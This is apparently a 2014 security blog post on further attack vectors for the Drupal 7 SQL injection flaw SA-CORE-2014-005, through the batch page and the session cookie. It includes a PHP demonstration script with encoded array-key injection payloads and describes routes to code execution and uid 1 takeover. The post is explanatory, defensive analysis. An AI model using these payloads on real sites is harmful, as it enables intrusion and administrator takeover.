Other vectors for SA-CORE-2014-005?
Heine Fri, 2014/10/31 - 21:57
This is intended as a comment on Acquia's "Learning from hackers a week after the Drupal SQL Injection announcement", but Mollom prevents me from posting it there. In it, scor asks:
An open question is whether the SQL injection vulnerability was exploitable via some vector other than via the user login form.
Absolutely! The flaw sits in the database layer's handling of array-valued query arguments, so any path reachable by anonymous users that passes request data into a query is exposed; a POST to the login form is merely the best-known way to reach it. Examples:
System batch processing
The batch page is reachable by anonymous users, because it runs a SQL query before doing its access checks, and that query takes its id straight from the request. It reads $_REQUEST, so either GET or POST works, and depending on your PHP configuration (request_order, or variables_order when request_order is empty, containing C) even a COOKIE can be used.
The batch record that query returns is unserialized and can name a file to include and the callbacks to run, so if one prefers, and is able to upload a file to the site, a slightly modified injected query can cause that file to be executed. Alternatively, one could try to piggyback on the unserialize call itself and have a destructor do the work (PHP object injection).
Session handling code (COOKIE)
The default session handler stores sessions in the database, so on each request it has to query the sessions table by the identifier the client presents in order to load the stored session.
If the site uses HTTPS, the lookup falls back to the non-HTTPS session cookie, taking its value straight from $_COOKIE; since PHP parses a cookie named like an array (name[key]) into an array, this value can be used to conduct a SQL injection attack. Because the query joins the session row to its user row and the result becomes the current user, an exploit could result in uid 1 access to the site, possibly _without_ even having to insert a session into the database.
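To make both vectors concrete, here is an added example (not Drupal's code, and not part of the original post): a stand-alone re-implementation of the array-argument expansion that Drupal 7 before 7.32 performed in DatabaseConnection::expandArguments(), fed with the batch id and the session cookie discussed above. The query texts are trimmed to the shape used by core, the cookie name SESSdeadbeef is an assumption, and the injected statement is an inert SELECT chosen to show the mechanism rather than to do anything.

```php
<?php
// Added example, not Drupal's code: a stand-alone re-implementation of the
// array-argument expansion that Drupal 7 before 7.32 did in
// DatabaseConnection::expandArguments(). Query texts are trimmed to the
// shape core used; the cookie name SESSdeadbeef is an assumption.

// Expand ":key => array(...)" into ":key_0, :key_1, ...". Before 7.32 the
// suffix was the array key exactly as supplied, so a key taken from the
// request went straight into the SQL text. The fix was one array_values().
function expand_arguments($query, array $args, $fixed) {
  foreach (array_filter($args, 'is_array') as $key => $data) {
    if ($fixed) {
      $data = array_values($data);   // keys become 0, 1, 2, ... again
    }
    $new_keys = array();
    foreach ($data as $i => $value) {
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

function show($label, $query, array $args, $fixed) {
  list($q, $a) = expand_arguments($query, $args, $fixed);
  printf("%-18s %s\n", $label . ':', $q);
  printf("%-18s bound: %s\n", '', implode(' | ', array_keys($a)));
}

// PHP turns "name[key]=value" into a nested array whether it arrives in the
// query string, a form body or the Cookie header; parse_str() applies the
// same decoding, so it stands in for $_GET/$_POST/$_REQUEST/$_COOKIE here.
// "#" comments out the rest of the statement for MySQL. The second element
// (id[]=1) gives a parameter named plainly ":bid_0", matching the placeholder
// token PDO will still scan out of the rewritten text.
$payload = 'id[0%3B+SELECT+%27injected%27%3B%23]=1&id[]=1';
parse_str($payload, $request);

// 1. Batch page: $_REQUEST['id'] was bound to :bid before any access check.
//    With C in request_order (or in variables_order when request_order is
//    empty) the same keys can arrive in a cookie.
$batch_query = 'SELECT batch FROM {batch} WHERE bid = :bid AND token = :token';
$batch_args  = array(':bid' => $request['id'], ':token' => 'token-value');
show('batch, < 7.32', $batch_query, $batch_args, FALSE);
show('batch, 7.32', $batch_query, $batch_args, TRUE);

// 2. Session lookup on an HTTPS site: when no HTTPS session row is found,
//    $_COOKIE[<insecure session cookie name>] was bound to :sid. A cookie
//    named SESS...[key] is parsed into an array just like the query string
//    above. PHP splits the Cookie header on ";" before URL-decoding the
//    names, so the ";" and "#" in the key must be sent encoded (%3B, %23).
parse_str('SESSdeadbeef[0%3B+SELECT+%27injected%27%3B%23]=x&SESSdeadbeef[]=x', $cookie);
$session_query = "SELECT s.*, u.* FROM {sessions} s INNER JOIN {users} u ON u.uid = s.uid WHERE s.sid = :sid AND s.ssid = ''";
$session_args  = array(':sid' => $cookie['SESSdeadbeef']);
show('session, < 7.32', $session_query, $session_args, FALSE);
show('session, 7.32', $session_query, $session_args, TRUE);
```

Run it with the PHP CLI. In the "< 7.32" lines the text after ":bid_0" and ":sid_0" is the injected SELECT, spliced into the SQL before PDO ever sees a placeholder, and the bound-parameter names carry the same text; in the "7.32" lines only ":bid_0, :bid_1" and ":sid_0, :sid_1" appear. The fixed output is not a sensible query for a scalar comparison, but nothing attacker-controlled reaches the statement text, which is the property the fix restores.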
I haven't seen these, nor the use of other potential avenues, in the wild, but then again, I can only observe a small number of sites.